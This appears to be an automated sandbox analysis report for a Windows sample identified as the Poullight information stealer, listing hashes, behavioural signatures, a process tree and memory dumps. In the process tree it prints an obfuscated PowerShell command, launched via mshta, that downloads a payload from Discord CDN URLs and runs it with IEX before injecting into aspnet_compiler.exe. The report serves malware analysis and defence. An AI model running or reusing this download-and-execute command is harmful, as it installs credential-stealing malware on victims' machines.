Analysis

  • max time kernel
    84s
  • max time network
    153s
  • platform
    windows10_x64
  • resource
    win10v20210408
  • submitted
    17-08-2021 03:10

General

  • Target

    eufive_20210816-144801.exe

  • Size

    482KB

  • MD5

    5ba895fb23729ffbb001e5dfe74aa132

  • SHA1

    7a2b094329f369ff5a67971c3a71c46775e93000

  • SHA256

    7fc66f244e022341520c4af91172ec3833c36b95624ee5c510086cd8d71db7ae

  • SHA512

    34ad4a38eb4983018e1c626550378ef4622be2fb02b74d1bacf9155cc835fb838a092c53b5b46e1ee45eac4ba13e723e661bb5e969480a56d2839d14d79c8cde

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://cdn.discordapp.com/attachments/875404916150116402/875405053467459594/Minutes.txt

Signatures

  • Poullight

    Poullight is an information stealer first seen in March 2020.

  • Poullight Stealer Payload 3 IoCs
  • Suspicious use of NtCreateProcessExOtherParentProcess 1 IoCs
  • Blocklisted process makes network request 4 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 19 IoCs
  • Suspicious use of AdjustPrivilegeToken 5 IoCs
  • Suspicious use of WriteProcessMemory 12 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\eufive_20210816-144801.exe
    "C:\Users\Admin\AppData\Local\Temp\eufive_20210816-144801.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:3128
    • C:\Windows\System32\mshta.exe
      "C:\Windows\System32\mshta.exe" https://cdn.discordapp.com/attachments/875404916150116402/875405147503751198/Sekonds.txt
      2⤵
      • Blocklisted process makes network request
      • Suspicious use of WriteProcessMemory
      PID:604
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $SRDTFYGUHIUGYFTDRYDTYUFUGIHLUGYFUTDUFY='https://cdn.discordapp.com/attachments/875404916150116402/875405053467459594/Minutes.txt';$SFDDHGFJGKHLJKHJGHFGFGDHFGHK='DOWNSDFGDHFJGKHFGHDFGDHJGKHFJGDHFSHGDHJKGFHGDHFSHGDJFKJGKJKHFJGDHING'.Replace('SDFGDHFJGKHFGHDFGDHJGKHFJGDHFSHGDHJKGFHGDHFSHGDJFKJGKJKHFJGDH','LOADSTR');$RGHTFYGUKLHIDZXFCGVJHBHVGCFXDZFGXFHCGJV='SYEFSRGDTHYFUGKYFTDRSEASGRDHTFYUGKKGYFTDHRGDM.NEDTHFYJGUKHGYFTDRYTFYGUHGYFTDYFYGUTDUFYGUBClIENT'.Replace('EFSRGDTHYFUGKYFTDRSEASGRDHTFYUGKKGYFTDHRGD','STE').Replace('DTHFYJGUKHGYFTDRYTFYGUHGYFTDYFYGUTDUFYGU','T.WE');$ESTRDYTUFYGIUHIJOSERDTFYJGUKYTDRSTDYFUGK = '(NAFSHDGFJGKHLGFSGRHTDYFJGUKYFTDHRSHDTFYBJECT $RGHTFYGUKLHIDZXFCGVJHBHVGCFXDZFGXFBBBBBBBBBBBBBBHHHHHHHHHHHHHRDTFYGUHIUGYFTDRYDTYUFUGIHLUGYFUTDUFY)'.Replace('AFSHDGFJGKHLGFSGRHTDYFJGUKYFTDHRSHDTFY','EW-O').Replace('BBBBBBBBBBBBBBHHHHHHHHHHHHH','HCGJV ).$SFDDHGFJGKHLJKHJGHFGFGDHFGHK($S');$ERTTDYFYUGUYTREZRTFYGKUFDSS45HD6F7GK=&('I'+'EX')($ESTRDYTUFYGIUHIJOSERDTFYJGUKYTDRSTDYFUGK -Join '')|&('I'+'EX');
        3⤵
        • Blocklisted process makes network request
        • Suspicious use of SetThreadContext
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2916
        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
          4⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:668
          • C:\Windows\SysWOW64\WerFault.exe
            C:\Windows\SysWOW64\WerFault.exe -u -p 668 -s 1312
            5⤵
            • Suspicious use of NtCreateProcessExOtherParentProcess
            • Program crash
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:3272

Network

MITRE ATT&CK Matrix ATT&CK v6

Discovery

System Information Discovery

1
T1082

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/604-116-0x0000000000000000-mapping.dmp
  • memory/668-147-0x000000000041A94E-mapping.dmp
  • memory/668-159-0x00000000072F0000-0x00000000072F1000-memory.dmp
    Filesize

    4KB

  • memory/668-158-0x0000000006150000-0x0000000006151000-memory.dmp
    Filesize

    4KB

  • memory/668-157-0x0000000005570000-0x0000000005571000-memory.dmp
    Filesize

    4KB

  • memory/668-156-0x0000000005360000-0x0000000005361000-memory.dmp
    Filesize

    4KB

  • memory/668-155-0x00000000052A0000-0x000000000579E000-memory.dmp
    Filesize

    5.0MB

  • memory/668-154-0x0000000005380000-0x0000000005381000-memory.dmp
    Filesize

    4KB

  • memory/668-153-0x00000000057A0000-0x00000000057A1000-memory.dmp
    Filesize

    4KB

  • memory/668-146-0x0000000000400000-0x0000000000420000-memory.dmp
    Filesize

    128KB

  • memory/2916-126-0x000001AE41850000-0x000001AE41851000-memory.dmp
    Filesize

    4KB

  • memory/2916-145-0x000001AE41590000-0x000001AE4159E000-memory.dmp
    Filesize

    56KB

  • memory/2916-134-0x000001AE415C6000-0x000001AE415C8000-memory.dmp
    Filesize

    8KB

  • memory/2916-128-0x000001AE415C3000-0x000001AE415C5000-memory.dmp
    Filesize

    8KB

  • memory/2916-127-0x000001AE415C0000-0x000001AE415C2000-memory.dmp
    Filesize

    8KB

  • memory/2916-123-0x000001AE414D0000-0x000001AE414D1000-memory.dmp
    Filesize

    4KB

  • memory/2916-118-0x0000000000000000-mapping.dmp
  • memory/3128-114-0x0000000000120000-0x0000000000121000-memory.dmp
    Filesize

    4KB